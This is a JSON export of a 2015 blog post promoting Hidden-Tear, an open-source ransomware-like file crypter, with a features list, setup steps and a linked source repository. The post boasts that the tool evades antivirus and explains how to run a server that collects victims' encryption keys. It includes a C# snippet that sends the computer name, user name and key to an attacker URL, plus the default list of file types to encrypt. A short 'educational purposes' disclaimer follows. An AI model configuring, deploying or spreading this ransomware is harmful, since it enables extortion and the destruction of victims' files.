{"id":2539,"date":"2015-08-20T04:53:48","date_gmt":"2015-08-20T04:53:48","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=2539"},"modified":"2015-08-20T04:53:48","modified_gmt":"2015-08-20T04:53:48","slug":"hidden-tear-an-opensource-ransomware-like-file-crypter","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=2539","title":{"rendered":"Hidden-Tear &#8211; An OpenSource Ransomware-like File Crypter"},"content":{"rendered":"<pre class=\"\"><code>    _     _     _     _              _                  \n    | |   (_)   | |   | |            | |                 \n    | |__  _  __| | __| | ___ _ __   | |_ ___  __ _ _ __ \n    | '_ \\| |\/ _` |\/ _` |\/ _ \\ '_ \\  | __\/ _ \\\/ _` | '__|\n    | | | | | (_| | (_| |  __\/ | | | | ||  __\/ (_| | |   \n    |_| |_|_|\\__,_|\\__,_|\\___|_| |_|  \\__\\___|\\__,_|_|   \n<\/code><\/pre>\n<p>It&#8217;s a ransomware-like file crypter sample which can be modified for specific purposes.<br \/>\n<strong>Features<\/strong><\/p>\n<ul>\n<li>Uses AES algorithm to encrypt files.<\/li>\n<li>Sends encryption key to a server.<\/li>\n<li>Encrypted files can be decrypt in decrypter program with encryption key.<\/li>\n<li>Creates a text file in Desktop with given message.<\/li>\n<li>Small file size (12 KB)<\/li>\n<li>Doesn&#8217;t detected to antivirus programs (15\/08\/2015) <a href=\"http:\/\/nodistribute.com\/result\/6a4jDwi83Fzt\">http:\/\/nodistribute.com\/result\/6a4jDwi83Fzt<\/a><\/li>\n<\/ul>\n<p><strong>Demonstration Video:<\/strong><br \/>\n<iframe title=\"hidden tear demonstration\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/LtiRISepIfs?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><br \/>\n&nbsp;<br \/>\n<strong>Usage:<\/strong><\/p>\n<ul>\n<li>You need to have a web server which supports scripting languages like php,python etc. Change this line with your URL. (You better use Https connection to avoid eavesdropping)<code>string targetURL = \"https:\/\/www.example.com\/hidden-tear\/write.php?info=\";<\/code><\/li>\n<li>The script should writes the GET parameter to a text file. Sending process running in<code>SendPassword()<\/code> function\n<pre><code>string info = computerName + \"-\" + userName + \" \" + password;\nvar fullUrl = targetURL + info;\nvar conent = new System.Net.WebClient().DownloadString(fullUrl);\n<\/code><\/pre>\n<\/li>\n<li>Target file extensions can be change. Default list:<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<pre>var validExtensions = new[]{\".txt\", \".doc\", \".docx\", \".xls\", \".xlsx\", \".ppt\", \".pptx\", \".odt\", \".jpg\", \".png\", \".csv\", \".sql\", \".mdb\", \".sln\", \".php\", \".asp\", \".aspx\", \".html\", \".xml\", \".psd\"};\n<\/pre>\n<p><strong>Legal Warning<\/strong><br \/>\nWhile this may be helpful for some, there are significant risks. hidden tear may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.<br \/>\n<a href=\"https:\/\/github.com\/utkusen\/hidden-tear\" target=\"_blank\" rel=\"noopener noreferrer\">Downalod Hidden-Tear at Github<\/a><br \/>\nCredits to:<br \/>\n<strong>Utku Sen<\/strong> &#8211; A Turkish security researcher<\/p>\n","protected":false},"excerpt":{"rendered":"<p>_ _ _ _ _ | | (_) | | | | | | | |__ _ __| | __| | ___ _ __ | |_ ___ __ _ _ __ | &#8216;_ \\| |\/ _` |\/ _` |\/ _ \\ &#8216;_ \\ | __\/ _ \\\/ _` | &#8216;__| | | | | |<\/p>\n","protected":false},"author":1,"featured_media":2542,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[394,443,554,13,556],"tags":[553,555],"class_list":["post-2539","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cryptography","category-hacking","category-malware","category-opensource","category-ransomeware","tag-crypter","tag-ransomware"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2539","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2539"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2539\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2539"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2539"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2539"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}